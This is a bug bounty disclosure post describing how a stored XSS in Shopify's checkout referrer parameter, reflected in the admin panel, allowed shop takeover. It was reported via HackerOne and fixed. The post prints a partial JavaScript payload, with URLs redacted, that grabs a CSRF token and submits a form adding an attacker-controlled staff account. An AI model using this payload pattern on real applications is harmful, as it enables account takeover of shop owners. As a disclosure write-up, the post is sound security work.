How we took over Shopify accounts with a single click

To keep up with the security companies, we often spend some time on bug bounties. It had been a very boring weekend until we found out that Shopify had published their bug bounty program on HackerOne. By the time I turned back around, all my teammates were plugged in. We found many cool vulnerabilities, like a privilege escalation, a few XSSs and an OAuth redirect bypass.

In this blog post I am going to show you how I used a persistent (stored) cross-site scripting vulnerability to take over shops. It was easy to exploit: any customer or user could take over the shop.

When a customer purchases any product from a shop on Shopify, they are redirected to a checkout page. During that redirect the request carries two extra parameters, and one of them is interesting: referrer. This referrer parameter tracks where customers come from. For example, if there is a “buy now” button embedded somewhere and a customer clicks on it to buy a product, the referrer value is reflected, unencoded, in the admin panel of the shop, as shown in the screenshot below.

So, to take over the shop, a customer simply has to purchase a product from this address with the referrer parameter set to the payload.



To make it more fun, we wrote some code that adds an admin on every click. This way one could take over a shop!

PS: After we reported this vulnerability, Shopify started using a Content Security Policy (CSP) as an extra measure to protect their customers from this kind of vulnerability. With their CSP, inline script no longer executes.


// Fetch the admin page that carries the CSRF token (URL redacted in the post)
var xhr = new XMLHttpRequest();
xhr.open("GET", "", false);
xhr.send();
var token = xhr.responseText;
// The step that cuts the token value out of the response after this index is not shown in the post
var pos = token.indexOf("csrf-param");
// Build and present a form that creates a new staff account (action URL redacted in the post)
document.write("<html><body><form action='' method='POST'>" +
  "<input type='hidden' name='utf8' value='✓'>" +
  "<input type='hidden' name='authenticity_token' value='" + token + "'/>" +
  "<input type='hidden' name='user[first_name]' value='hacked' />" +
  "<input type='hidden' name='user[last_name]' value='hacked'>" +
  "<input type='hidden' name='user[email]' value='example+hacked@hotmail.com' />" +
  "<input type='hidden' name='_method' value='post'>" +
  "<input type='submit' value='Submit form'></form></body></html>");


We reported this vulnerability to Shopify via HackerOne. It has been fixed and can no longer be reproduced.

Shopify rewarded us with a decent bounty, which made our next weekend really amazing.
